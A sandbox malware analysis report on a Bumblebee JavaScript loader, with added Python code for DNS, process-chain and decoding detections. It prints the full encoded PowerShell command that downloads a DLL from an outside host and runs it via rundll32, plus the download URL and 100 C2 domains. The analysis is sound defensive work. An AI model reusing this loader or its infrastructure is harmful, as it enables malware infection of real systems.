Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
submitted: 22-10-2024 21:04
Static task: static1
Behavioral task: behavioral1
Sample: Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
Resource: win7-20240708-en

General
Target: Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
Size: 42KB
MD5: c77a5b4849df9ec7bdcdf970504c6bf5
SHA1: cea1a6eff08bf3c54eb889af265b0f62f6897cf9
SHA256: 3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637
SHA512: a24a3ca285cd942f1170f75ceb23a97c441cf7694b53af8e5c1c880e5ff6bbddde50f78e28a97785276998b5c7646ffccb34d5e2d0f13fe8a85acaa80f8bf98e
SSDEEP: 768:2/OWgWxiLG0nMLTYFFd4SCEA4iuxbSHsH0G4SCS64TN+n6AmiY7BTER/Xzb1ql83:zBgR/Xzb1qblhoooLCk+TBUVDiwQ+pa2
Malware Config
Extracted (first-stage download URL, from the PowerShell -EncodedCommand): https://mycocojamboo.com/bgfhfg/lGmEQCgpfT.dll
Extracted: bumblebee (lnk001)
dga:
tvx1ovdepj8.life
acgr6r8zdot.life
ilofx941igp.life
8x2apo5m7ri.life
x9yrzer0ndt.life
93j4v4jopzd.life
ameagxzo2f7.life
nyy41uibsv5.life
ru4jvijdytq.life
l9t6r0y6cvi.life
f4vb9n3tdvh.life
9do3mcejztt.life
pxu1ajsdhqr.life
7exy2b231n2.life
vu5b47m18jn.life
6mnudp7zj73.life
p5047yjrb8q.life
d0xtxp89bb9.life
ygo9u1fkwux.life
fig3gj0v6qe.life
38f5wvwwn7o.life
txgogs9p8a1.life
uyn0icgx1kv.life
2z1ls31az7s.life
0cc2z8zrnhf.life
fsr2hskx44p.life
du19ek78tjw.life
234ct3lkozp.life
he8fq4k8d3w.life
7ewh8ltr7il.life
dw34kmgfl7t.life
f2j20ayqh8y.life
331k2rdkmmb.life
37z6li6l9y2.life
dpgs2lt1sbz.life
plll0xq4y82.life
bzc9sq2pz53.life
7r8ln1wswth.life
y9neib92f2m.life
m5iukps17y7.life
xo8be64ejh2.life
widn8soih8u.life
08mkuqnx6gv.life
lzeqr3apopn.life
o4m5a5no7e8.life
2u8znzsbrto.life
dxyob8x456a.life
lrugnff8fkc.life
38i6lh0rpze.life
mjb3r6mcs1f.life
vl41cymzzfq.life
qc4mwjiop45.life
z3z4fq0420z.life
0tab35o0swu.life
4izk0gc9is6.life
6brdh3p893b.life
736d0mvetjw.life
drmk5rdefb5.life
1v0xhie4os8.life
khxcp22s3dz.life
8z9m8hndrhp.life
xeoz1f1vjs0.life
lobavyclh8e.life
in4pzu7t2pv.life
j280b59doxz.life
6q894zusd4k.life
y7pzxau0717.life
bev8ymaajb7.life
glux8x5b8d6.life
yan95akxgqt.life
9qiliikd3sp.life
ge0lpqif3ar.life
ar7xakeve0o.life
eb4l6wisq9z.life
1grovn87c8s.life
wdga570b8pz.life
nzs8vi9w5o8.life
q7dfpyyhe08.life
exueqqmz3ia.life
65r8nx12fqr.life
vauy5ah65sx.life
8hjv8mbhrlj.life
eeqwg3mzq07.life
b1h0uaabzyz.life
8qvt5iabz5n.life
8ru044xed25.life
w8ligr695sd.life
3e6rrifr5fn.life
9f6p9g7x13s.life
ibcm5at6qrz.life
spd22scperm.life
4k59ij2ujeu.life
07zxfo0kere.life
nhdeapyfg7e.life
y0zvqpi42no.life
zdf5ki8x9r0.life
8mgj12azbyd.life
l6syolvczan.life
mk7plk9c6i2.life
hudrx8fn980.life
dga_seed: 1016365528594956469
domain_length: 11
num_dga_domains: 100
port: 443
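Detection logic for the extracted DGA configuration, as an added example that is not part of the sandbox report. It derives a domain-shape check from the config above (11 lowercase alphanumerics under .life) and runs it, together with an exact-match list, over constructed DNS query log lines. The log lines, the client IP and the log format are invented for the example, and only four of the 100 listed domains are embedded (93j4v4jopzd.life, which is in the report's list, is deliberately left out of the embedded subset so it is caught by shape alone). The report does not disclose the generation algorithm, so the shape check is a heuristic that matches any 11-character alphanumeric .life name: it should drive a hunt or an alert, not a block.

```python
import re

# Values taken from the extracted Bumblebee config in this report.
DGA_DOMAIN_LENGTH = 11
DGA_TLD = "life"

# Exact-match indicators from the report: the first-stage download host and a
# subset of the 100 listed DGA domains (the full list would go here).
STAGER_HOSTS = {"mycocojamboo.com"}
KNOWN_DGA_DOMAINS = {
    "tvx1ovdepj8.life", "acgr6r8zdot.life", "ilofx941igp.life", "hudrx8fn980.life",
}


def dga_shape_pattern(length: int = DGA_DOMAIN_LENGTH, tld: str = DGA_TLD):
    """Regex for the shape every listed domain has: `length` lowercase
    alphanumerics, then the configured TLD. Shape only; the generation
    algorithm itself is not in the report."""
    return re.compile(rf"^[a-z0-9]{{{length}}}\.{re.escape(tld)}$")


DGA_SHAPE = dga_shape_pattern()


def config_matches_domains(domains) -> bool:
    """Sanity check: do the domains listed in the report agree with the
    domain_length/TLD the config claims? Catches a stale or mis-parsed config."""
    return all(DGA_SHAPE.match(d) for d in domains)


def classify(qname: str) -> str:
    """Exact indicators first, then the DGA shape heuristic."""
    d = qname.lower().rstrip(".")
    if d in STAGER_HOSTS:
        return "stager_host"
    if d in KNOWN_DGA_DOMAINS:
        return "known_dga"
    if DGA_SHAPE.match(d):
        return "dga_shape"
    return "clean"


# Constructed DNS query log (not from the report): timestamp, client, qtype, qname.
SAMPLE_LOG = """\
2024-10-22T21:05:01Z 10.0.0.5 A helpx.adobe.com
2024-10-22T21:05:03Z 10.0.0.5 A mycocojamboo.com
2024-10-22T21:05:09Z 10.0.0.5 A tvx1ovdepj8.life
2024-10-22T21:05:10Z 10.0.0.5 A 93j4v4jopzd.life
2024-10-22T21:05:11Z 10.0.0.5 A zzzzzzzzzzz.life
2024-10-22T21:05:12Z 10.0.0.5 A login.microsoftonline.com
"""


def flag_queries(log_text: str) -> list:
    """Return (client, qname, verdict) for every non-clean query, in log order."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:  # skip blank or malformed lines
            continue
        _ts, client, _qtype, qname = fields
        verdict = classify(qname)
        if verdict != "clean":
            hits.append((client, qname, verdict))
    return hits


if __name__ == "__main__":
    for hit in flag_queries(SAMPLE_LOG):
        print(*hit)
```

The zzzzzzzzzzz.life line is there to show the cost of the heuristic: it is flagged as dga_shape although it is not in the report, which is why shape matches and exact matches carry different verdicts.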
Signatures
Bumblebee family

The malicious chain in this run is wscript.exe (3544) -> powershell.exe (3260) -> powershell.exe (2428) -> rundll32.exe (1556). The msedge.exe and identity_helper.exe entries below come from the decoy branch, powershell.exe (3168) opening the Adobe Reader update page in Edge, and are ordinary browser behaviour.

Blocklisted process makes network request (19 IoCs)
All 19 flows originate from pid 1556, rundll32.exe (the process hosting the dropped dllfile.dll):
flows 31, 110, 141, 156, 158, 160, 162, 166, 173, 175, 177, 182, 188, 198, 200, 202, 204, 207, 211

Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell and hide display window.
pid 3260 powershell.exe
pid 2428 powershell.exe
pid 3168 powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation (wscript.exe)

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Enumerates system info in registry (2 TTPs, 3 IoCs)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)

Suspicious behavior: EnumeratesProcesses (17 IoCs)
pid 3260 powershell.exe (x2), 2428 powershell.exe (x2), 3168 powershell.exe (x3), 2784 msedge.exe (x2), 1968 msedge.exe (x2), 3432 identity_helper.exe (x2), 5856 msedge.exe (x4)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
pid 1968 msedge.exe (x6)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Token: SeDebugPrivilege, pid 3260 powershell.exe
Token: SeDebugPrivilege, pid 2428 powershell.exe
Token: SeDebugPrivilege, pid 3168 powershell.exe

Suspicious use of FindShellTrayWindow (25 IoCs)
pid 1968 msedge.exe (x25)

Suspicious use of SendNotifyMessage (24 IoCs)
pid 1968 msedge.exe (x24)

Suspicious use of WriteProcessMemory (64 IoCs)
pid   Process         wrote to pid  procid_target  count
3544  wscript.exe     3260          84             2
3260  powershell.exe  2428          86             2
2428  powershell.exe  1556          99             2
3544  wscript.exe     3168          107            2
3168  powershell.exe  1968          109            2
1968  msedge.exe      1668          110            2
1968  msedge.exe      1264          111            40
1968  msedge.exe      2784          112            2
1968  msedge.exe      1160          113            10
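The WriteProcessMemory table above is the parent/child chain in tabular form. As an added example (not code from the sandbox vendor or from the Bumblebee operators), the Python below replays that chain as process-creation records and applies two detections a SOC would want from it: a script host (wscript.exe/cscript.exe) spawning powershell.exe, with a hidden window and -EncodedCommand recorded as aggravating details, and rundll32.exe loading a DLL from a user-writable AppData path via DllRegisterServer with powershell.exe somewhere in its ancestry. The records are reconstructed from the report's process tree; wscript.exe's own parent is not shown in the report, so its ppid is None, and the base64 blob is truncated after 32 characters. The rule names and the record layout are this example's own.

```python
import re

# Process-creation records reconstructed from the process tree in this report
# (pid, parent pid, image, command line). wscript.exe's parent is not in the
# report, so ppid=None; the -EncodedCommand blob is truncated after 32 chars.
EVENTS = [
    dict(pid=3544, ppid=None, image=r"C:\Windows\system32\wscript.exe",
         cmdline=r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js"),
    dict(pid=3260, ppid=3544, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgA...'),
    dict(pid=2428, ppid=3260, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgA...'),
    dict(pid=1556, ppid=2428, image=r"C:\Windows\system32\rundll32.exe",
         cmdline=r'"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer'),
    dict(pid=3168, ppid=3544, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"'),
    dict(pid=1968, ppid=3168, image=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
         cmdline=r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# -w hidden / -W Hidden / -WindowStyle Hidden
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# -e / -enc / -EncodedCommand followed by a base64 run of meaningful length
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestor_images(pid: int, by_pid: dict):
    """Yield image basenames walking up the ppid links; stops at an unknown
    parent or a cycle (pids get reused, as 1888 does in this report)."""
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] is not None and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid.get(ev["ppid"])
        if ev is not None:
            yield basename(ev["image"])


def detect(events: list) -> list:
    """Return (pid, rule, details) for every record that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        cmd = e["cmdline"]
        # Rule 1: a script host launching PowerShell is the loader's first hop.
        if name == "powershell.exe" and parent and basename(parent["image"]) in SCRIPT_HOSTS:
            details = []
            if HIDDEN_RE.search(cmd):
                details.append("hidden_window")
            if ENCODED_RE.search(cmd):
                details.append("encoded_command")
            hits.append((e["pid"], "script_host_spawns_powershell", tuple(details)))
        # Rule 2: rundll32 running a DLL from AppData via DllRegisterServer,
        # with PowerShell anywhere above it, is the payload execution hop.
        if (name == "rundll32.exe"
                and USER_WRITABLE_RE.search(cmd)
                and re.search(r",\s*DllRegisterServer\b", cmd, re.I)
                and "powershell.exe" in set(ancestor_images(e["pid"], by_pid))):
            hits.append((e["pid"], "rundll32_user_writable_dll_under_powershell", ()))
    return hits


if __name__ == "__main__":
    for pid, rule, details in detect(EVENTS):
        print(pid, rule, *details)
```

The decoy branch (3168) trips rule 1 as well, only without the encoded-command detail: a script host launching a hidden PowerShell is worth an alert even when the command it runs looks harmless, because here it is the same JS file doing both.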
Processes
(indentation shows parent/child depth)

C:\Windows\system32\wscript.exe (PID 3544)
  cmd: wscript.exe C:\Users\Admin\AppData\Local\Temp\Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3260, parent 3544)
    cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2428, parent 3260)
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand …
      (the blob is elided in the report; the parent's command line shows it is simply re-invoking powershell with the same -EncodedCommand argument)
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\rundll32.exe (PID 1556, parent 2428)
        cmd: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer
        - Blocklisted process makes network request

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3168, parent 3544)
    cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1968, parent 3168)
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

      msedge.exe (PID 1668, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd630d46f8,0x7ffd630d4708,0x7ffd630d4718

      msedge.exe (PID 1264, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

      msedge.exe (PID 2784, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses

      msedge.exe (PID 1160, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8

      msedge.exe (PID 1888, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

      msedge.exe (PID 3144, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

      identity_helper.exe (PID 4716, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8

      identity_helper.exe (PID 3432, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses

      msedge.exe (PID 2844, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1

      msedge.exe (PID 380, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

      msedge.exe (PID 4136, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

      msedge.exe (PID 1888, parent 1968; pid reused after the earlier renderer exited)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1

      msedge.exe (PID 5856, parent 1968)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1296 /prefetch:2
        - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe (PID 1568)
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 2016)
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
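To turn the -EncodedCommand blob in the process tree into indicators, here is an added example that is not part of the sandbox report. PowerShell's -EncodedCommand is base64 over UTF-16LE, so the decoder reads it that way (a plain base64 decode shows every other byte as NUL); it then evaluates the three `$var=...` assignments the script uses so the rundll32 argument resolves to the same path the process tree shows for PID 1556. The blob is copied verbatim from PID 3260's command line. The only assumption is the sandbox's %APPDATA% value, C:\Users\Admin\AppData\Roaming, taken from the paths in the report; on any other host read it from the environment. The function names and the IoC dictionary keys are this example's own.

```python
import base64
import re

# The -EncodedCommand argument exactly as it appears in the process tree above.
ENCODED = "JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA"

# Sandbox profile directory, taken from the paths in the report. This is an
# assumption for any other host, where %APPDATA% must come from the environment.
APPDATA = r"C:\Users\Admin\AppData\Roaming"


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 of the script encoded as UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def resolve_variables(script: str) -> dict:
    """Evaluate the `$name=...;` assignments this loader uses. Only string
    literals, $env:APPDATA and previously assigned variables are understood,
    which is all the decoded script needs; anything else becomes ''."""
    env = {"env:APPDATA": APPDATA}
    for name, expr in re.findall(r"\$([A-Za-z0-9_]+)=([^;]+);", script):
        value = ""
        for literal, ref in re.findall(r"'([^']*)'|\$([A-Za-z0-9_:]+)", expr):
            value += literal if literal else env.get(ref, "")
        env[name] = value
    return env


def extract_iocs(script: str) -> dict:
    """Pull the network and host indicators out of the decoded script."""
    env = resolve_variables(script)
    url = re.search(r"https?://[^\s'\"]+", script)
    staging = re.search(r"Test-Path\s+\$([A-Za-z0-9_]+)", script)
    run = re.search(r"rundll32\.exe\s+\$([A-Za-z0-9_]+),([A-Za-z0-9_]+)", script)
    return {
        "download_url": url.group(0) if url else None,
        # Start-BitsTransfer means the download shows up as a BITS job, not as
        # a powershell.exe socket: look in the BITS client log, not just netflow.
        "downloader": "BITS" if "Start-BitsTransfer" in script else "other",
        "staging_dir": env.get(staging.group(1)) if staging else None,
        "dropped_dll": env.get(run.group(1)) if run else None,
        "rundll32_export": run.group(2) if run else None,
    }


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED)
    print(script)
    for key, value in extract_iocs(script).items():
        print(f"{key}: {value}")
```

Decoded, the script is a one-liner: it stores the URL, builds %APPDATA%\sDkpD3I8, creates that directory if missing, fetches the DLL with Start-BitsTransfer into dllfile.dll, and hands it to rundll32.exe with the DllRegisterServer export, which is exactly the rundll32.exe command line the sandbox recorded for PID 1556.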
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: 61e2e57471d559f5f6813c0a7995c075
SHA1: 33c621541bc0892ddab1b65345a348c14af566e5
SHA256: c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d
SHA512: 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

Filesize: 152B
MD5: 443a627d539ca4eab732bad0cbe7332b
SHA1: 86b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA256: 1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512: 923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Filesize: 152B
MD5: 99afa4934d1e3c56bbce114b356e8a99
SHA1: 3f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA256: 08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA512: 76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Path: C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 816B
MD5: 575cfcde7332b11b500f391131e6291f
SHA1: 4bb949b996fa76f829c23b4114c65c324102fcf6
SHA256: b30076e49c143f95700e9da694ea40c102df21fa393e127fb836d4320517bdfb
